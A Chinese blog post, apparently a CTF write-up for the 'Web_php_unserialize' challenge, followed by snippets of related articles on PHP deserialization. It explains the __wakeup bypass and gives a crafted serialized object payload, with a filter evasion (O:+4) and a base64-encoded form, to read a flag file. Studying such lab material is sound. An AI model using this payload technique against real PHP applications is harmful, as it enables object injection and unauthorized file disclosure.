unserialize与__destruct、__wakeup

最新推荐文章于 2022-03-07 23:55:48 发布
最新推荐文章于 2022-03-07 23:55:48 发布
阅读量1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whisper_ZH/article/details/102639179
版权

攻防世界:Web_php_unserialize

**

知识:

  1. PHP__wakeup()函数漏洞
    在程序执行前,serialize() 函数会首先检查是否存在一个魔术方法 __sleep.如果存在,__sleep()方法会先被调用, 然后才执行串行化(序列化)操作。这个功能可以用于清理对象,并返回一个包含对象中所有变量名称的数组。如果该方法不返回任何内容,则NULL被序列化,导致 一个E_NOTICE错误。与之相反,unserialize()会检查是否存在一个__wakeup方法。如果存在,则会先调用 __wakeup方法,预先准备对象数据。但是这个wakeup()是可以被绕过的
    __wakeup 触发于 unserilize() 调用之前, 当反序列化时的字符串所对应的对象的数目被修改,__wake 的函数就不会被调用. 并且不会重建为对象, 但是会触发其他的魔术方法比如__destruct

绕过方法及漏洞详细内容1(https://xz.aliyun.com/t/378)
绕过方法及漏洞详细内容2(http://www.she1don.cn/index.php/archives/20.html)

**

解题

  1. 求serialize Demo=>file=fl4g如下:
    O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}
  2. 根据代码
if (preg_match('/[oc]:\d+:/i', $var)) { 
       die('stop hacking!'); 
   } else {
       @unserialize($var); 
   }

可以得到字母‘o’后不能加‘:’和数字组合即传入O:4会触发if条件,所以将O:4改为O:+4,然后绕过wakeup()函数,将"Demo":1改为"Demo":2,改完如下:
O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}
3. 进行base64编码得到:
TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ

  1. 得到flag:
    在这里插入图片描述
whisper_ZH
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
例如,他们可能利用PHP的魔术方法(如`__destruct()`或`__wakeup()`)来在反序列化时执行自定义代码。 为了成功解决此挑战,参赛者需要对PHP的序列化格式有深入理解,包括如何表示不同类型的变量(如数组、对象、...
深入讲解PHP的对象注入(Object Injection)
10-20
例如,攻击者可能利用`__destruct()`方法删除敏感文件,或者通过`__wakeup()`方法执行恶意代码。 在上述的`LogClass`示例中,如果允许用户控制`$logfilename`属性,攻击者可能在反序列化时触发`__destruct()`方法,...
PHP----DESTRUCT
Damys
02-08 1000
1.      析构方法会自动调用 2.      析构方法主要用于销毁资源 3.      析构方法调用顺序是,先创建的对象后被销毁 4.      析构方法什么时候被调用 (1)    当程序(进程结束)退出时 (2)    当一个对象称为垃圾对象的时候,该对象的析构方法也会被调用, (3)    所谓垃圾对象,就是指,没有任何变量再引用它. (4)    一旦一个对象成为垃圾对
php clone wakeup,PHP中的魔术方法总结 :__construct, __destruct , __call, __callStatic,__get, __set, __isset, ...
weixin_33272141的博客
03-26 160
PHP中的魔术方法总结 :__construct, __destruct , __call, __callStatic,__get, __set, __isset, __unset , __sleep, __wakeup, __toString, __set_state, __clone and __autoload1、__get、__set这两个方法是为在类和他们的父类中没有声明的属性而设计的_...
unserialize函数和__wakeup魔术方法
Home to come
04-18 645
之前做过unserialize的题,当时看了wp,做是做出来来了,但是没有看懂这到底是什么东东,这次再次碰见了,认真的搜索了一下原理 什么是serialize? PHP 序列化后的内容是简单的文本格式,但是对字母大小写和空白(空格、回车、换行等)敏感,而且字符串是按照字节(或者说是 8 位的字符)计算的,因此,更合适的说法是 PHP 序列化后的内容是字节流格式。因此用其他语言实现时,如果所实现的...
php反序列化漏洞
wjq18827615690的博客
01-31 169
PHP反序列化漏洞复现 测试代码 我们运行以上代码文件,来证明函数被调用: 应为没有创建对象,所以构造函数__construct()不会被调用,但是__wakeup()跟__destruct()函数都被调用,如果这些函数里面包含的是恶意代码会怎么样呢? 利用场景 __wakeup() 或__destruct() 由前可以看到,unserialize()后会导致__wakeup() 或__destruct()的直接调用,中间无需其他过程。因此最理想的情况就是一些漏洞/...
关于unserialize绕过__wakeup
https://www.cnblogs.com/zpchcbd/
04-26 1460
unserialize 和 serialize的注意点: __construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) __destruct():当对象被销毁时会自动调用。(析构函数) __wakeup():unserialize() 时会自动调用。 DEMO class Demo { public $data; ...
信息安全_数据安全_9_ZN2018_WV_-_PHP_unserialize.pdf
08-21
`unserialize`不安全的主要原因是它可以触发魔术方法(magic methods),如`__wakeup()`、`__destruct()`和`__toString()`。这些方法在对象被反序列化后会被自动调用,如果恶意用户可以控制输入的数据,他们可能利用...
反序列化漏洞原理和靶场实践
最新发布
09-26
__wakeup() 方法会在 unserialize() 时被自动调用。 常见的魔术方法包括: * __get() * __set() * __isset() * __unset() * __construct() * __destruct() * __call() * __callStatic() * __sleep() * __wakeup() ...
PHP程序设计-3期(KC016) 课后习题2-2 魔术常量.doc
07-13
10. `__wakeup()`: 在`unserialize()`之后调用,用于在反序列化对象后恢复状态,如重新建立数据库连接。 示例中展示了如何利用这些魔术方法实现文件操作、可变方法调用以及对象序列化和反序列化的功能。`FileRead`...
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
mysql unserialize_serializeunserialize
weixin_34160181的博客
02-07 369
相对于网上其他关于Serialize的讲解,不下万篇,学习笔记,稍微总结一番。本篇文章按照浅谈php反序列化漏洞,进行学习指导,基础内容略过。举个栗子先举个例子说明serialize()与unserialize()显而易见,两个函数的例子所表达的形式就是这么简单。再捡个栗子接下来看看下面的例子:1234567891011121314151617181920212223242526header('C...
http路径转file会变成反斜杠_最全的PHP反序列化漏洞的理解和应用
weixin_39931923的博客
11-27 370
原创:f1r3K0合天智汇php反序列化漏洞,又叫php对象注入漏洞,是一种常见的漏洞,在我们进行代码审计以及CTF中经常能够遇到。01学习前最好提前掌握的知识PHP类与对象(https://www.php.net/manual/zh/language.oop5.php)PHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php...
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6287
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
unserialize() 函数
冷月醉雪的博客
04-26 7851
查看更多 https://www.yuque.com/docs/share/704b9677-67f0-4156-b81e-0e4cc4ec40ce
__destruct()析构方法的调用
weixin_40974880的博客
01-08 702
model=newlibmysqli();1、当nset(model = new lib_mysqli(); 1、当nset(model=newlibm​ysqli();1、当nset(model)时,会调用__destruct()方法 2、当对象执行类内的方法结束时候,调用__destruct();方法 ...
攻防世界-Web_php_unserialize详解
Mr_helloword的博客
08-10 4370
Web_php_unserialize 源码: <?php class Demo { //定义一个类 private $file = 'index.php'; //变量属性 public function __construct($file) { //类方法 $this->file = $file; } function __destruct() { echo @highlight_file(
XCTF-unserialize3(php __wakeup()函数的利用)
weixin_44823018的博客
01-10 1023
题目如下: 考点:如何跳过__wakeup()函数。 首先看看__wakeup()原理: __wakeup()原理:将在序列化之后立即被调用。 漏洞原理:当反序列化字符串中,表示属性个数的值大于其真实值,则跳过__wakeup()执行。 于是我们现在php在线测试构造代码: <?php class xctf{ public $flag = ‘111’; public function __...
攻防世界web_php_unserialize
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值